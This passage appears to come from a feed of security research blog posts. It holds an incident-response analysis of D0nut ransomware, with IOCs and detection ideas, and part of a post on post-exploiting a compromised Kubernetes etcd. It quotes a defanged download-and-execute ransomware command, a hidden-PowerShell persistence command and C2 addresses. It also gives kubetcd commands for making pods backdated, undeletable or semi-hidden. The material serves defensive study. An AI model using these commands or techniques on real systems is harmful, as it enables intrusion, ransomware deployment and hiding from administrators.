812263ea9c6c44ef6b4d3950c5a316f765b62404391ddb6482bdc9a23d6cc4a6 | Cobalt Strike | 18a9eafb936bf1d527bd4f0bfae623400d63671bafd0aad0f72bfb59beb44d5f
1358156c01b035f474ed12408a9e6a77fe01af8df70c08995393cbb7d1e1f8a6 | Cobalt Strike | b916749963bb08b15de7c302521fd0ffec1c6660ba616628997475ae944e86a3
73162738fb3b9cdd3414609d3fe930184cdd3223d9c0d7cb56e4635eb4b2ab67 | Cobalt Strike | 19e7bb5fa5262987d9903f388c4875ff2a376581e4c28dbf5ae7d128676b7065
343728792ed1e40173f1e9c5f3af894feacd470a9cdc72e4f62c0dc9cbf63fc1 | Putty | 0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
384408659efa1f87801aa494d912047c26259cd29b08de990058e6b45619d91a | Cobalt Strike stager | 824914bb34ca55a10f902d4ad2ec931980f5607efcb3ea1e86847689e2957210
49925637250438b05d3aebaac70bb180a0825ec4272fbe74c6fecb5e085bcf10 | Cobalt Strike | e0c0491e45dda838f4ac01b731dd39cc7064675a6e1b79b184fff99cdce52f54
Table 6, Hashes of Blister samples and of the payload it drops, including the payload label.

D0nut encrypt me, I have a wife and no backups 

6 November 2023 at 18:06

Unveiling the Dark Side: A Deep Dive into Active Ransomware Families

Author: Ross Inman (@rdi_x64)

Introduction

Our technical experts have written a blog series focused on Tactics, Techniques and Procedures (TTPs) deployed by four ransomware families recently observed during NCC Group's incident response engagements.

In case you missed it, last time we analysed an Incident Response engagement involving BlackCat Ransomware. In this instalment, we take a deeper dive into the D0nut extortion group. 

The D0nut extortion group was first reported in August 2022 for breaching networks and demanding ransoms in return for not leaking stolen data. A few months later, reports of the group utilizing encryption as well as data exfiltration were released, with speculation that the ransomware deployed by the group was linked to HelloXD ransomware. There are also suspected links between D0nut affiliates and both the Hive and Ragnar Locker ransomware operations.

Summary 

Tl;dr 

This post explores some of the TTPs employed by a threat actor who was observed deploying D0nut ransomware during an incident response engagement. 

The following is a summary of the findings presented in this blog post:

  • Heavy use of Cobalt Strike Beacons to laterally move throughout the compromised network.  
  • Deployment of SystemBC to establish persistence.  
  • Modification of a legitimate GPO to disable Windows Defender across the domain.  
  • Leveraging a bring your own vulnerable driver (BYOVD) attack to terminate system-level processes which may interfere with the deployment of ransomware.  
  • Use of RDP to perform lateral movement and browse folders to identify data for exfiltration.  
  • Data exfiltration over SFTP using Rclone.  
  • Deployment of D0nut ransomware.  

D0nut

D0nut leaks is a group that emerged during Autumn of 2022 and was initially reported to be performing intrusions into networks with the aim of exfiltrating data which they would then hold to ransom, without encrypting any files [1]. Further down the line, the group was seen adopting the double-extortion approach [2]. This includes encrypting files and holding the decryption key for ransom, as well as threatening to publish the stolen data should the ransom demand not be met.

Numerous potential links have been made to other ransomware groups and affiliates, with the ransomware encryptor reportedly sharing similarities with the HelloXD ransomware strain. Indications of a link were observed through the filenames of the ransomware executable deployed throughout the incident, with the filenames being xd.exe and wxd7.exe. However, it should be noted that this alone is not compelling evidence to indicate a link between the ransomware strains.  

Incident Overview  

Once the threat actor had gained their foothold within the network, they conducted lateral movement with a focus on the following objectives: 

  • Compromise a host which stores sensitive data which can be targeted for exfiltration.  
  • Compromise a domain controller.  

Cobalt Strike was heavily utilised to deploy Beacon, the payload generated by Cobalt Strike, to multiple hosts on the network so the threat actor could extend their access and visibility. 

A Remote Desktop Protocol (RDP) session was established to a file server, which allowed the threat actor to browse the file system and identify folders of interest to target for exfiltration. Data exfiltration was conducted using Rclone to upload files to a Secure File Transfer Protocol (SFTP) server controlled by the threat actor. Rclone allows for uploading of files directly from folders to cloud storage, meaning the threat actor did not need to perform any data staging prior to the upload.  

Before deploying the ransomware, the threat actor deployed malware capable of leveraging a driver, which has been used by other ransomware groups [3], to terminate any anti-virus (AV) or endpoint detection and response (EDR) processes running on the system; this technique is known as bring your own vulnerable driver (BYOVD). Additionally, the threat actor modified a pre-existing group policy object (GPO) and appended configuration that would prevent Windows Defender from interfering with any malware that was dropped on the systems.

Ransomware was deployed to both user workstations and servers on the compromised domain. An ESXi server was also impacted, resulting in the hosted virtual machines suffering encryption that was performed at the hypervisor level.  

The total time from initial access to encryption is believed to be less than a week.  

TTPs 

Lateral Movement 

The following methods were utilised to move laterally throughout the victim network: 

  • Cobalt Strike remotely installed temporary services on targeted hosts which executed Beacon, triggering a call back to the command and control (C2) server and providing the operator access to the system. An example command line of what the services were configured to run is provided below:

A service was installed in the system.  

Service Name: <random alphanumeric characters> 

Service File Name: \\<target host>\ADMIN$\<random alphanumeric characters>.exe  

Service Type: user mode service  

Service Start Type: demand start  

Service Account: LocalSystem 

  • RDP sessions were established using compromised domain accounts.  
  • PsExec was also used to facilitate remote command execution across hosts. 
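As an illustrative aid (not from the engagement itself), the service installation events above lend themselves to simple detection logic: a short random alphanumeric service name combined with a service binary in an ADMIN$ share is a strong indicator of Cobalt Strike's remote service execution. A minimal sketch over Windows System log Event ID 7045 fields, where the name-length threshold is an assumption:

```python
import re

def is_suspicious_service(service_name: str, image_path: str) -> bool:
    """Heuristic for Cobalt Strike-style temporary service installs
    (Event ID 7045): a random-looking alphanumeric service name whose
    binary was dropped into a remote ADMIN$ share."""
    # Purely alphanumeric, no spaces or dots, within a plausible length.
    random_name = re.fullmatch(r"[A-Za-z0-9]{4,12}", service_name) is not None
    # UNC path into the ADMIN$ administrative share.
    admin_share = re.search(r"\\\\[^\\]+\\ADMIN\$\\", image_path, re.IGNORECASE) is not None
    return random_name and admin_share
```

In practice this would be applied to collected 7045 events; legitimate services occasionally trip the name check, so the ADMIN$ condition does most of the filtering.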

Persistence

The threat actor used SystemBC to establish persistence within the environment. The malware was set to execute whenever a user logs in to the system, which was achieved by modifying the registry key Software\Microsoft\Windows\CurrentVersion\Run within the DEFAULT registry hive (please note this is not referring to the hive located at C:\Users\DEFAULT\NTUSER.dat, but the hive located at C:\Windows\System32\config\DEFAULT). An entry was created under the run key which ran the following command, resulting in execution of SystemBC: 

powershell.exe -windowstyle hidden -Command " 'C:\programdata\explorer.exe'" 
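To illustrate how this persistence mechanism could be hunted for, the sketch below scans a registry export for run-key values that launch PowerShell with a hidden window. The export sample and the entry name "socks" are hypothetical; only the key path and command line mirror what was observed:

```python
import re

# Hypothetical `reg export` excerpt of the DEFAULT hive's Run key;
# the value name "socks" is an assumption for illustration.
REG_EXPORT = r'''
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"socks"="powershell.exe -windowstyle hidden -Command \" 'C:\\programdata\\explorer.exe'\""
'''

def hidden_powershell_entries(reg_export: str):
    """Return names of run-key values that launch PowerShell hidden."""
    pattern = re.compile(
        r'"([^"]+)"="([^\n]*powershell[^\n]*-windowstyle hidden[^\n]*)"',
        re.IGNORECASE,
    )
    return [name for name, _ in pattern.findall(reg_export)]
```

The same check applies to per-user NTUSER.DAT hives, not just the DEFAULT hive called out above.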

Defense Evasion

As part of their efforts to evade interference from security software, the threat actor made use of two files, d.dll and def.exe, which were responsible for dropping the vulnerable driver RTCore64.sys, which has reportedly been exploited by other ransomware groups to disable AV and EDR solutions. The files were dropped in the following folders: 

  • C:\temp\ 
  • C:\ProgramData\ 

Analysis of def.exe identified that the program escalated privileges via process injection, allowing it to terminate any system-level processes not present in its internally stored whitelist.   

The threat actor took additional measures by appending registry configuration to a pre-existing GPO that would disable the detection and prevention functionality of Windows Defender. Exclusions for all files with a .exe or .dll extension were also set, along with exclusions for files within the C:\ProgramData\ and C:\ directories. The below configuration was applied across all hosts present on the compromised domain:  

Figure 1 Parsed Registry.pol showing malicious configuration added by the threat actor
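Since the parsed Registry.pol is shown only as a figure, the idea can be conveyed with a sketch: given policy entries as (key, value, data) tuples, flag those that disable Defender or add exclusions. The sample entries are illustrative, though the key and value names follow the standard Windows Defender policy locations:

```python
# Illustrative parsed Registry.pol entries as (key, value, data) tuples.
SAMPLE_ENTRIES = [
    (r"Software\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", 1),
    (r"Software\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableRealtimeMonitoring", 1),
    (r"Software\Policies\Microsoft\Windows Defender\Exclusions\Extensions", "exe", 0),
    (r"Software\Policies\Microsoft\Windows Defender\Exclusions\Paths", r"C:\ProgramData\\", 0),
]

def defender_tampering(entries):
    """Flag policy entries that disable Defender features ('Disable*'
    values set to 1) or register scanning exclusions."""
    findings = []
    for key, value, data in entries:
        if value.startswith("Disable") and data == 1:
            findings.append(f"{key}\\{value}")
        if "\\Exclusions\\" in key:
            findings.append(f"exclusion: {value}")
    return findings
```

Auditing domain GPOs for unexpected writes under the Windows Defender policy keys is a cheap detection for this class of tampering.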

Command and Control

Cobalt Strike Beacons were heavily utilised to maintain a presence within the network and to extend access via lateral movement.  

SystemBC was also deployed sparingly and appeared to be purely for establishing persistence within the network. SystemBC is a commodity malware backdoor which leverages SOCKS proxying for covert channelling of C2 communications to the operator. Serving as a proxy, SystemBC becomes a conduit for other malware deployed by threat actors to tunnel C2 traffic. Additionally, certain variants facilitate downloading and execution of further payloads, such as shellcode or PowerShell scripts issued by the threat actor.  

Analysis of the executable identified the following IP addresses which are contacted on port 4001 to establish communications with the C2 server: 

  • 85.239.52[.]7  
  • 194.87.111[.]29  
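As a hedged example of turning these indicators into a quick triage check, the snippet below matches remote endpoints from netstat-style output against the SystemBC C2 pairs (the sample output lines in the test are hypothetical):

```python
# Known SystemBC C2 endpoints from the analysed sample.
C2_ENDPOINTS = {("85.239.52.7", 4001), ("194.87.111.29", 4001)}

def find_c2_connections(netstat_lines):
    """Return lines whose remote address:port matches a known C2 pair.
    Assumes 'PROTO LOCAL REMOTE STATE' column order, as in Windows
    `netstat -an` output."""
    hits = []
    for line in netstat_lines:
        parts = line.split()
        if len(parts) >= 3 and ":" in parts[2]:
            ip, _, port = parts[2].rpartition(":")
            if port.isdigit() and (ip, int(port)) in C2_ENDPOINTS:
                hits.append(line)
    return hits
```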

Exfiltration  

Rclone, an open-source file cloud storage program heavily favoured by threat actors to perform data exfiltration, was deployed once the threat actor had identified a system which hosted data of interest. Through recovering the Rclone configuration file located at C:\User\<user>\AppData\Roaming\rclone.conf, the SFTP server 83.149.93[.]150 was identified as the destination of the exfiltrated data.  
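rclone.conf is a plain INI file, so a recovered copy can be mined for network IOCs with a few lines of standard-library Python. The config below is a hypothetical reconstruction; only the host matches the observed SFTP server, and the remote name and user are assumptions:

```python
import configparser

# Hypothetical reconstruction of the recovered rclone.conf.
RCLONE_CONF = """
[ftp1]
type = sftp
host = 83.149.93.150
user = donut
port = 22
"""

def sftp_destinations(conf_text):
    """Extract (remote_name, host) pairs for SFTP remotes in an rclone
    config, e.g. to turn a recovered config into network indicators."""
    cfg = configparser.ConfigParser()
    cfg.read_string(conf_text)
    return [(section, cfg[section]["host"])
            for section in cfg.sections()
            if cfg[section].get("type") == "sftp"]
```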

Initially deployed as rclone.exe, the threat actor swiftly renamed the file to explorer.exe in an attempt to blend in. However, due to the file residing in the File Server Resource Manager (FSRM) folder C:\StorageReports\Scheduled\, this artefact was highly noticeable.  

Impact

Ransomware was deployed to workstations and servers once the threat actor had exfiltrated data from the network to use as leverage in the forthcoming ransom demands. The ransomware also impacted an ESXi server, encrypting the hosted virtual machines at the hypervisor level.  

Volume shadow copies for a data drive of a file server were purged by the threat actor preceding the ransomware execution.   

The ransomware was downloaded and executed via the following PowerShell command: 

powershell.exe iwr -useb hxxp[:]//ix[.]io/4uD0 -outfile xd.exe ; .\xd.exe debug defgui 

In some other instances, the ransomware was deployed as wxd7.exe. The ransomware executables were observed being executed from the following locations (the folders likely vary from case to case, with the threat actor using arbitrary folders in the root of C:\): 

  • C:\Temp\ 
  • C:\ProgramData\ 
  • C:\storage\ 
  • C:\StorageReports\

During analysis of the ransomware executable, the following help message was derived which provides command line arguments for the program: 

Figure 2 Help message contained within the ransomware executable

A fairly unique ransom note is dropped after the encryption process in the form of a HTML file named readme.html: 

Figure 3 Ransomware readme note

Recommendations  

  1. Ensure that both online and offline backups are taken, and test the backup plan regularly to identify any weak points that could be exploited by an adversary.  
  2. Hypervisors should be isolated by placing them in a separate domain or by adding them to a workgroup to ensure that any compromise in the domain in which the hosted virtual machines reside does not pose any risk to the hypervisors.  
  3. Restrict internal RDP and SMB traffic so that only hosts that are required to communicate via these protocols are allowed to.     
  4. Monitor firewalls for anomalous spikes in data leaving the network. 
  5. Apply Internet restrictions to servers so that they can only establish external communications with known good IP addresses and domains that are required for business operations. 

If you have been impacted by D0nut, or currently have an incident and would like support, please contact our Cyber Incident Response Team on +44 331 630 0690 or email [email protected]

Indicators Of Compromise  

IOC Value Indicator Type Description  
hxxp[:]//ix[.]io/4uD0 URL Hosted ransomware executable – xd.exe 
85.239.52[.]7:4001 IP:PORT SystemBC C2 
194.87.111[.]29:4001 IP:PORT SystemBC C2 
83.149.93[.]150 IP Address SFTP server used for data exfiltration 
eb876e23dbbfe44c7406fcc7f557ee772894cc0b SHA1 Ransomware executable – wxd7.exe 
d4832169535e5d91b91093075f3b10b96973a250 SHA1 SystemBC executable – explorer.exe 
550cd82011df93cc89dc0431fa13150707d6aca2 SHA1 Used to kill AV and EDR processes – def.exe 
f6f11ad2cd2b0cf95ed42324876bee1d83e01775 SHA1 Used to kill AV and EDR processes – RTCore.sys 
C:\ProgramData\xd.exe C:\temp\xd.exe C:\storage\xd.exe C:\Temp\wxd7.exe C:\ProgramData\wxd7.exe C:\storage\wxd7.exe C:\StorageReports\wxd7.exe File Path Ransomware executable 
C:\ProgramData\explorer.exe File Path SystemBC 
C:\StorageReports\Scheduled\explorer.exe  File Path Rclone 
C:\ProgramData\def.exe C:\temp\def.exe C:\ProgramData\d.dll C:\temp\d.dll File Path Used to kill AV and EDR processes 
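The indicators above are defanged for safe handling; a small helper to refang them before matching against logs or proxy records:

```python
def refang(ioc: str) -> str:
    """Convert defanged indicators (as listed in the IOC table) back
    into a matchable form, e.g. hxxp[:]//ix[.]io/4uD0."""
    return (ioc.replace("hxxp", "http")
               .replace("[:]", ":")
               .replace("[.]", "."))
```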

MITRE ATT&CK®

Tactic Technique ID Description  
Execution  Command and Scripting Interpreter: PowerShell T1059.001 PowerShell was utilized to execute malicious commands  
Execution  System Services: Service Execution T1569.002 Cobalt Strike remotely created temporary services to execute its payload 
Execution  System Services: Service Execution T1569.002 PsExec creates a service to perform its execution 
Persistence Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 SystemBC created a run key entry to establish persistence.    
Privilege Escalation  Process Injection: Portable Executable Injection T1055.002 def.exe achieved privilege escalation through process injection 
Defense Evasion  Impair Defenses: Disable or Modify Tools T1562.001 The threat actor modified a legitimate GPO to disable Windows Defender functionality 
Defense Evasion Impair Defenses: Disable or Modify Tools T1562.001 def.exe and d.dll were deployed to terminate EDR and AV services 
Lateral Movement Remote Services: SMB/Windows Admin Shares T1021.002 Cobalt Strike targeted SMB shares for lateral movement 
Lateral Movement Remote Services: SMB/Windows Admin Shares T1021.002 PsExec uses SMB shares to execute processes on remote hosts 
Lateral Movement Remote Services: Remote Desktop Protocol T1021.001 RDP was used to establish sessions to other hosts on the network  
Command and Control Proxy: External Proxy T1090.002 SystemBC communicates with its C2 server via proxies 
Exfiltration  Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol T1048.002 The threat actor exfiltrated data to an SFTP server 
Impact  Inhibit System Recovery T1490 Volume shadow copies for a file server were deleted prior to encryption from the ransomware 
Impact Data Encrypted for Impact T1486 Ransomware was deployed to the estate and impacted both servers and user workstations 
Impact Data Encrypted for Impact T1486 Virtual machines hosted on an ESXi server were encrypted at the hypervisor level 

Post-exploiting a compromised etcd – Full control over the cluster and its nodes

7 November 2023 at 08:00

Kubernetes is essentially a framework of various services that make up its typical architecture, which can be divided into two roles: the control-plane, which serves as a central control hub and hosts most of the components, and the nodes or workers, where containers and their respective workloads are executed.

Within the control plane we typically find the following components:

  • kube-apiserver: This component acts as the brain of the cluster, handling requests from clients (such as kubectl) and coordinating with other components to ensure their proper functioning.
  • scheduler: Responsible for determining the appropriate node to deploy a given pod to.
  • controller manager: Manages the status of nodes, jobs, and service accounts.
  • etcd: A key-value store that stores all cluster-related data.

Inside the nodes we typically find:

  • kubelet: An agent running on each node, responsible for keeping the pods running and in a healthy state.
  • kube-proxy: Exposes services running on pods to the network.

When considering the attack surface in Kubernetes, we usually think of unauthenticated components, such as the kube-apiserver and kubelet, leaked tokens or credentials that grant access to certain cluster features, and non-hardened containers that may provide access to the underlying host. Etcd, by contrast, is often perceived solely as an information storage element within the cluster from which secrets can be extracted. In reality, etcd is much more than that.

What is etcd and how it works?

Etcd, which is an external project to the core of Kubernetes, is a non-relational key-value database that stores all the information about the cluster, including pods, deployments, network policies, roles, and more. In fact, when performing a cluster backup, what is actually done is a dump of etcd, and during a restore operation, this is also done through this component. Given its critical role in the Kubernetes architecture, can’t we use it for more than just extracting secrets?

Its function as a key-value database is straightforward. Entries can be added or edited using the put command, the value of keys can be retrieved using get, deletions can be performed using delete, and a directory tree structure can be created:

$ etcdctl put /key1 value1
OK
$ etcdctl put /folder1/key1 value2
OK
$ etcdctl get / --prefix --keys-only
/folder1/key1
/key1
$ etcdctl get /folder1/key1
/folder1/key1
value2
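This flat keyspace with prefix queries can be modelled in a few lines of Python (an in-memory toy, not an etcd client) to show that the "directory tree" is really just key naming:

```python
class TinyKV:
    """Toy model of etcd's flat keyspace: 'directories' are just key
    prefixes, and a prefix query is a filtered, sorted key scan."""

    def __init__(self):
        self._store = {}

    def put(self, key, value):
        self._store[key] = value

    def get(self, key):
        return self._store.get(key)

    def keys_with_prefix(self, prefix):
        # Equivalent to `etcdctl get <prefix> --prefix --keys-only`.
        return sorted(k for k in self._store if k.startswith(prefix))

kv = TinyKV()
kv.put("/key1", "value1")
kv.put("/folder1/key1", "value2")
```

Listing with the "/" prefix reproduces the ordering shown in the etcdctl session above.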

How kubernetes uses etcd: Protobuf

While the operation of etcd is relatively straightforward, let’s take a look at how Kubernetes injects its resources into the database, such as a pod. Let’s create a pod and extract its entry from etcd:

$ kubectl run nginx --image nginx
pod/nginx created
$ kubectl get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          20s
$ ETCDCTL_API=3 etcdctl --endpoints 127.0.0.1:2379 --cert=/etc/kubernetes/pki/etcd/server.crt --key=/etc/kubernetes/pki/etcd/server.key --cacert=/etc/kubernetes/pki/etcd/ca.crt get /registry/pods/default/nginx
/registry/pods/default/nginx
k8s

v1Pod�
�

nginx▒default"*$920c8c37-3295-4e66-ad4b-7b3ad57f2c192�퇣Z

runnginxbe
!cni.projectcalico.org/containerID@545434f9686cc9ef02b4dd16f6ddf13a89e819c25a30ed7c103a4ab8a86d7703b/
ni.projectcalico.org/podIP10.96.110.138/32b0
cni.projectcalico.org/podIPs10.96.110.138/32��
calicoUpdate▒v�퇣FieldsV1:�
�{"f:metadata":{"f:annotations":{".":{},"f:cni.projectcalico.org/containerID":{},"f:cni.projectcalico.org/podIP":{},"f:cni.projectcalico.org/podIPs":{}}}}Bstatus��

kubectl-runUpdate▒v�퇣FieldsV1:�
�{"f:metadata":{"f:labels":{".":{},"f:run":{}}},"f:spec":{"f:containers":{"k:{\\"name\\":\\"nginx\\"}":{".":{},"f:image":{},"f:imagePullPolicy":{},"f:name":{},"f:resources":{},"f:terminationMessagePath":{},"f:terminationMessagePolicy":{}}},"f:dnsPolicy":{},"f:enableServiceLinks":{},"f:restartPolicy":{},"f:schedulerName":{},"f:securityContext":{},"f:terminationGracePeriodSeconds":{}}}B��
kubeletUpdate▒v�퇣FieldsV1:�
�{"f:status":{"f:conditions":{"k:{\\"type\\":\\"ContainersReady\\"}":{".":{},"f:lastProbeTime":{},"f:lastTransitionTime":{},"f:status":{},"f:type":{}},"k:{\\"type\\":\\"Initialized\\"}":{".":{},"f:lastProbeTime":{},"f:lastTransitionTime":{},"f:status":{},"f:type":{}},"k:{\\"type\\":\\"Ready\\"}":{".":{},"f:lastProbeTime":{},"f:lastTransitionTime":{},"f:status":{},"f:type":{}}},"f:containerStatuses":{},"f:hostIP":{},"f:phase":{},"f:podIP":{},"f:podIPs":{".":{},"k:{\\"ip\\":\\"10.96.110.138\\"}":{".":{},"f:ip":{}}},"f:startTime":{}}}Bstatus�
�
kube-api-access-b9xkqk�h
"

�▒token
(▒ 

kube-root-ca.crt
ca.crtca.crt
)'
%
        namespace▒
v1metadata.namespace��
nginxnginx*BJL
kube-api-access-b9xkq▒-/var/run/secrets/kubernetes.io/serviceaccount"2j/dev/termination-logrAlways����File▒Always 2
                                                                                                                   ClusterFirstBdefaultJdefaultR
                                                                                                                                                kind-worker2X`hr���default-scheduler�6
node.kubernetes.io/not-readyExists▒"    NoExecute(��8
node.kubernetes.io/unreachableExists▒"  NoExecute(�����PreemptLowerPriority▒�
Running#

InitializedTrue�퇣*2
ReadyTrue�퇣*2'
ContainersReadyTrue�퇣*2$

PodScheduledTrue�퇣*2▒"*
10.96.110.13�퇣B�
nginx

�퇣▒ (2docker.io/library/nginx:latest:_docker.io/library/nginx@sha256:480868e8c8c797794257e2abd88d0f9a8809b2fe956cbfbc05dcc0bca1f7cd43BMcontainerd://dbe056bb7be0dfb74a3f8dc6bd75441fe9625d2c56bd5fcd988b780b8cb6884eHJ
BestEffortZb
10.96.110.138▒"

As you can see, the data extracted from the pod in etcd is not just alphanumeric characters. This is because Kubernetes serialises the data using protobuf.

Protobuf, short for Protocol Buffers, is a data serialisation format developed by Google that is independent of programming languages. It enables efficient communication and data exchange between different systems. Protobuf uses a schema or protocol definition to define the structure of the serialised data. This schema is defined using a simple language called the Protocol Buffer Language.

For example, let’s consider a protobuf message to represent data about a person. We would define the structure of the protobuf message as follows:

syntax = "proto3";

message Person {
  string name = 1;
  int32 age = 2;
  string email = 3;
}
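To make the serialisation concrete, here is a minimal hand-rolled encoder for that Person message using protobuf's wire format, without the protobuf library. Each field is a tag byte, computed as (field_number << 3) | wire_type, followed by either a varint (wire type 0) or a length-delimited payload (wire type 2):

```python
def varint(n: int) -> bytes:
    """Encode a non-negative integer as a protobuf base-128 varint."""
    out = bytearray()
    while n > 0x7F:
        out.append((n & 0x7F) | 0x80)  # set continuation bit
        n >>= 7
    out.append(n)
    return bytes(out)

def encode_person(name: str, age: int, email: str) -> bytes:
    """Serialise the Person message defined above (assumes age >= 0;
    negative int32 values need the full 10-byte varint encoding)."""
    buf = b""
    nb = name.encode()
    buf += bytes([(1 << 3) | 2]) + varint(len(nb)) + nb   # field 1: string
    buf += bytes([(2 << 3) | 0]) + varint(age)            # field 2: int32
    eb = email.encode()
    buf += bytes([(3 << 3) | 2]) + varint(len(eb)) + eb   # field 3: string
    return buf
```

The strings remain readable in the output while the framing bytes do not, which is exactly the mix of text and "noise" visible in the etcd dump of the pod above.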

If we wanted to serialise other types of data, such as car or book data, the parameters required to define them would be different to those required to define a person. The same principle is true for Kubernetes. In Kubernetes, multiple resources can be defined, such as pods, roles, network policies, and namespaces, among others. While they share a common structure, not all of them can be serialised in the same way, as they require different parameters and definitions. Therefore, different schemas are required to serialise these different objects.

Fortunately, there is auger, an application developed by Joe Betz, a technical staff member at Google. Auger collects the Kubernetes source code and all the schemas, allowing the serialisation and deserialisation of data stored in etcd into YAML and JSON formats. At NCC Group, we have created a wrapper for auger called kubetcd to demonstrate the potential criticality of a compromised etcd through a proof of concept (PoC).

Limitations

As a post-exploitation technique, this approach has several limitations. The first and most obvious is that we would need to have compromised, as root, the host running the etcd service, which is typically exposed only on localhost. This is necessary because we need access to the following certificates in order to authenticate to the service. The default paths used by most installation scripts are:

  • /etc/kubernetes/pki/etcd/ca.crt
  • /etc/kubernetes/pki/etcd/server.crt
  • /etc/kubernetes/pki/etcd/server.key (this is only readable by root)

A second limitation is that we would need to have the desired items already present in the cluster in order to use them as templates, especially for those that execute, such as pods. This is necessary because there is execution metadata that is added once the build request has passed through the kube-apiserver, and occasionally there is third-party data (e.g. Calico) that is not typically included in a raw manifest.

The third and final limitation is that this technique is only applicable to self-managed environments, which can include on-premises or virtual instances in the cloud. Cloud providers that offer managed Kubernetes are responsible for managing and securing the control plane, which means that access to not only etcd but also the scheduler or controller manager is restricted and users cannot interact with them. Therefore, this technique is not suitable for managed environments.

Injecting resources and tampering data

Recognising that data entry is done through serialisation with protobuf using different schemas, the kubetcd wrapper aims to emulate the typical syntax of the native kubectl client. However, when interacting directly with etcd, many fields that are managed by the logic of the kube-apiserver can be modified without restriction. A simple example would be the timestamp, which indicates the creation date and time of a pod:

root@kind-control-plane:/# kubectl get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          38s
root@kind-control-plane:/# kubetcd create pod nginx -t nginx --time 2000-01-31T00:00:00Z
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/default/nginx
OK
root@kind-control-plane:/# kubectl get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          23y

Changing the timestamp of a newly created Pod would help to make it appear, beyond what is shown in the event logs, as if it had been running in the cluster for a certain period of time. This could give any administrator pause as to whether it would be appropriate to delete it or whether it would affect any services.
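The AGE column is derived purely from metadata.creationTimestamp, which is why the backdated pod above renders as 23y. A simplified re-implementation of that duration formatting (kubectl's real logic has more cases, e.g. combined units like "2d3h"):

```python
from datetime import datetime, timezone

def age_string(created: str, now: str) -> str:
    """Render elapsed time since an RFC 3339 creationTimestamp in its
    largest whole unit, kubectl-style (simplified)."""
    fmt = "%Y-%m-%dT%H:%M:%SZ"
    c = datetime.strptime(created, fmt).replace(tzinfo=timezone.utc)
    n = datetime.strptime(now, fmt).replace(tzinfo=timezone.utc)
    seconds = int((n - c).total_seconds())
    for unit, size in (("y", 365 * 86400), ("d", 86400), ("h", 3600), ("m", 60)):
        if seconds >= size:
            return f"{seconds // size}{unit}"
    return f"{seconds}s"
```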

Persistence

Now that we know we can tamper with the startup date of a pod, we can explore modifying other parameters, such as changing the path in etcd to gain persistence in the cluster. When we create a pod named X, it is injected into etcd at the path /registry/pods/<namespace>/X. However, with direct access to etcd, we can make the pod name and its path in the database not match, which will prevent it from being deleted by the kube-apiserver:

root@kind-control-plane:/# kubetcd create pod nginxpersistent -t nginx -p randomentry
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/default/randomentry
OK
root@kind-control-plane:/# kubectl get pods
NAME              READY   STATUS    RESTARTS   AGE
nginx             1/1     Running   0          23y
nginxpersistent   1/1     Running   0          23y
root@kind-control-plane:/# kubectl delete pod nginxpersistent
Error from server (NotFound): pods "nginxpersistent" not found
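From a defensive standpoint, this mismatch is detectable by reading etcd directly and comparing each key against the metadata inside the stored manifest. A sketch over already-deserialised entries (a real implementation would first deserialise the protobuf values, e.g. via auger or kubetcd):

```python
def find_path_mismatches(entries):
    """entries: mapping of etcd key -> deserialised pod manifest (dict).
    Flags pods whose etcd path does not match their metadata; such pods
    cannot be deleted by name through the kube-apiserver."""
    mismatches = []
    for path, manifest in entries.items():
        # Keys follow the shape /registry/pods/<namespace>/<name>.
        _, _, _, ns, name = path.split("/")
        meta = manifest["metadata"]
        if meta["name"] != name or meta["namespace"] != ns:
            mismatches.append(path)
    return mismatches

entries = {
    "/registry/pods/default/nginx": {"metadata": {"name": "nginx", "namespace": "default"}},
    "/registry/pods/default/randomentry": {"metadata": {"name": "nginxpersistent", "namespace": "default"}},
}
```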

Taking this a step further, it is possible to create inconsistencies in pods by manipulating not only the pod name, but also the namespace. By running pods in a namespace that does not match the entry in etcd, we can make them semi-hidden and difficult to identify or manage effectively:

root@kind-control-plane:/# kubetcd create pod nginx_hidden -t nginx -n invisible --fake-ns
Path Template:/registry/pods/default/nginx
Deserializing...
Tampering data...
Serializing...
Path injected: /registry/pods/invisible/nginx_hidden
OK

Note that with --fake-ns, the invisible namespace is only used for the etcd injection path, but the default namespace has not been replaced in its manifest. Because of this inconsistency, the pod will not appear when listing the default namespace, and the invisible namespace will not be indexed. This pod will only appear when all resources are listed using --all or -A:

root@kind-control-plane:/# kubectl get pods
NAME              READY   STATUS    RESTARTS   AGE
nginx             1/1     Running   0          23y
nginxpersistent   1/1     Running   0          23y
root@kind-control-plane:/# kubectl get namespaces
NAME                 STATUS   AGE
default              Active   13m
kube-node-lease      Active   13m
kube-public          Active   13m
kube-system          Active   13m
local-path-storage   Active   13m
root@kind-control-plane:/# kubectl get pods -A | grep hidden
default              nginx_hidden  1/1     Running   0   23y

By manipulating the namespace entry in etcd, we can create pods that appear to run in one namespace, but are actually associated with a different namespace defined in their manifest. This can cause confusion and make it difficult for administrators to accurately track and manage pods within the cluster.

These are just a few basic examples of directly modifying data in etcd, specifically in relation to pods. However, the possibilities and combinations of these techniques can lead to other interesting scenarios.

Bypassing AdmissionControllers

Kubernetes includes several elements for cluster hardening, specifically for pods and their containers. The most notable elements are:

  • SecurityContext, which allows, among other things, preventing a pod from running as root, mounting filesystems in read-only mode, or blocking capabilities.
  • Seccomp, which is applied at the node level and restricts or enables certain syscalls.
  • AppArmor, which provides more granular syscall management than Seccomp.

However, all of these hardening features may require policies to enforce their use, and this is where Admission Controllers come into play. There are several types of built-in admission controllers, and custom ones can also be created, known as webhook admission controllers. Whether built-in or webhook, they can be of two types:

  • Validation: They accept or deny the deployment of a resource based on the defined policy. For example, the NamespaceExists Admission Controller denies the creation of a resource if the specified namespace does not exist.
  • Mutation: These modify the resource and the cluster to allow its deployment. For example, the NamespaceAutoProvision Admission Controller checks resource requests to be deployed in a namespace and creates the namespace if it does not exist.

